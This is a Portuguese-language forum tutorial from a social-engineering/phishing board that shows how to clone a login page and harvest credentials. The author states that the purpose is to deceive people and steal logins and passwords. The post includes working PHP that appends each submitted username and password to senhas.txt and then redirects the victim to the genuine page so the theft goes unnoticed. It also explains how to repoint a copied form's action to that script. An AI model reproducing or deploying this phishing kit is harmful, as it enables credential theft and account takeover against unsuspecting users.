[tutorial] criar uma pagina fake

Postagem de conteúdo sobre engenharia social
Post Reply
User avatar
Kodo no Kami
Admin
Admin
Posts: 725
Joined: Fri Jan 02, 2015 1:56 pm
Contact:

[tutorial] criar uma pagina fake

Post by Kodo no Kami » Sat Apr 04, 2015 10:47 pm

e ae galera nesse tutorial vou ensinar como criar um pagina fake, uma pagina fake é uma pagina identica a outra feita para enganar e roubar login e senha, ela é usada em conjunto com falhas como xss ou simplesmente phishing, para esse tutorial vamos usar uma pagina especifica que eu criei para evitar problemas (mesmo pq se eu tentar hospedar uma pagina fake de um site la no host minha conta é encerrada =/ )

Code: Select all

http://fts315.xp3.biz/Exemplo/formulariologin.php
Image

para criar uma pagina fake nao precisamos criar tudo do zero podemos salvar ela e modificar a parte do login, para salvar uma pagina web basta apertar control+s para salvar como (ou abrir o menu de opção e aparter em salvar como, tambem é possivel botao direito em cima da pagina e apertar em salvar como), quando salvar escolha pagina completa (ja coloque o nome e extensao da pagina certa antes de apertar em salvar pelo motivo de quando salva pagina completa nao da para modificar depois por causa dos arquivos), no meu caso tava salvando como "formulariologin.php.htm" eu coloquei para salvar com o nome "formulariologinfa.htm"

Image

agora vem a parte chata que é modificar a pagina fake, primeiro de tudo a gente abre a pagina que salvamos que vai ser a fake em um editor de texto puro (bloco de notas, notepad, dreamweaver)

Image

agora é so modificar, porem modificar oque exatamente? , bom vamos pensar um pouco, o que temos que modificiar é onde escrevemos o login e a senha correto, so que a interação entre o codigo html e php funciona entre formularios assim sendo quando temos que enviar o login e a senha para o script php que vai ler e comparar o login e senha para ver se esta correto existe um formulario entao temos que modificar na verdade é esse formulario, a tag de formulario é o <form> entao podemos procurar por ela, olhando a pagina eu achei o form

Code: Select all

<form method="POST" action="">
 login:
 <input type="text" name="usuario"> <br>
 senha:
 <input type="password" name="senha"> <br>
 <input type="submit" value="logar">
 </form>
analisando o form podemos notar que existe o texto "login:" depois dele tem um input do tipo text, esse input text é onde escrevemos o login, depois dele tem o texto "senha" e depois um input do tipo password, o input tipo password e parecido com o text unica diferença que aparece tudo em asterisco, e por fim tem um input do tipo submit que é um botao especifico para formulario ele que envia, analisando um pouco mais os inputs podemos ver que todos tem um atributo name, esse atributo name permite diferenciar um input do outro la no script php (menos o submit nao escrevemos nele entao nao precisamos manipular ele no php, ele tem um input value que é o texto dentro do botao), agora analisando os atributos da tag form nela tem o method e action, o atributo method é a forma que vai enviar nao precisamos nos aprofundar nisso (nela provavelmente vai ta GET ou POST), o atributo action é importante em uma pagina fake pq é ele que define para onde vai enviar as informação que no caso na pagina fake vai enviar para o nosso script que vai salvar, no caso da pagina de exemplo nao tem nada escrito nela isso quer dizer que ta enviando para a propria pagina e nao para outra url, o que vamos fazer agora é anotar os names para manipular pelo nosso script no caso os names é "usuario" e "senha", depois modificar o action para enviar para o nosso script que vai chamar kodo.php (no caso como o script vai ficar no mesmo diretorio que pagina fake so precisamos escrever o nome dele no action que é "kodo.php", se o script php ficar em um outro diretorio no servidor ou ate em outro servidor temos que colocar a url toda ou diretorio), o form vamos mudar apenas o action ficando assim (so vou colocar a parte do action para deixar mais limpo)

Code: Select all

<form method="POST" action="kodo.php">
a pagina fake ta pronta agora so falta criar o script que vai receber, antes disso vou da uma dica quando tem muito form ou ate tags é dificil achar o form certo, entao use o inspecionar elemeto do chrome ou firebug do firefox (firebug tem que instalar), no caso para achar o form basta apertar o botao direito do mouse em cima da parte desejada no caso seria um input e depois apertar em inspecionar elemeto com isso da para saber qual é form que o input pertece (isso é ele vai ta dentro dele ne kkk)

Image

agora vem a parte do script, criamos o script php no caso o meu se chama kodo.php (o mesmo nome que colocamos no action), dentro desse script temos que receber os dados que esta dentro dos dois input pra isso usamos dois $_REQUEST[] e passamos como argumento para ele os names, tambem atribuimos ele a variaveis

Code: Select all

<?php
 $usu = $_REQUEST["usuario"];
 $sen = $_REQUEST["senha"];
?>
eu quero que login e senha salve nesse formato "login:senha", entao vou concatenar o login e senha junto em outra variavel

Code: Select all

<?php
 $usu = $_REQUEST["usuario"];
 $sen = $_REQUEST["senha"];
 $us = $usu . ":" . $sen;
?>
agora armazenamos em um arquivos usamos a função fopen, nela passamos como argumento o nome do arquivo e a permissão de concatenação (a), tambem atribuimos o retorno para uma variavel para manipular o arquivo

Code: Select all

<?php
 $usu = $_REQUEST["usuario"];
 $sen = $_REQUEST["senha"];
 $us = $usu . ":" . $sen;
 $arquivo = fopen("senhas.txt","a");
?>
usamos a função fprintf para escrever no arquivo, nela passamos como argumento a variavel do arquivo, e o texto que vamos escrever

Code: Select all

<?php
 $usu = $_REQUEST["usuario"];
 $sen = $_REQUEST["senha"];
 $us = $usu . ":" . $sen;
 $arquivo = fopen("senhas.txt","a");
 fprintf($arquivo,$us);
?>
agora fechamos o arquivo com a função fclose passamos como argumento para ela a variavel do arquivo

Code: Select all

<?php
 $usu = $_REQUEST["usuario"];
 $sen = $_REQUEST["senha"];
 $us = $usu . ":" . $sen;
 $arquivo = fopen("senhas.txt","a");
 fprintf($arquivo,$us);
 fclose($arquivo);
?>
para terminar damos o pulo do gato redirecionando para a pagina verdadeira, para fazer isso podemos usar a função header passar como argumento para ela a string "location: " concatenada com a url da pagina verdadeira

Code: Select all

<?php
 $usu = $_REQUEST["usuario"];
 $sen = $_REQUEST["senha"];
 $us = $usu . ":" . $sen;
 $arquivo = fopen("senhas.txt","a");
 fprintf($arquivo,$us);
 fclose($arquivo);
 header("location: http://fts315.xp3.biz/Exemplo/formulariologin.php");
?>
pronto agora so hospedar ela e testar ^^

Image

é possivel que determinadas paginas seja mais complicado fazer nem sempre um formulario esta visivel na pagina ele pode ser criado dinamicamente por javascript entre outras coisas

by kõdo no kami
Image

que desagradavel ~ mirai kuriyama

Post Reply

Return to “Engenharia Social / Phishing”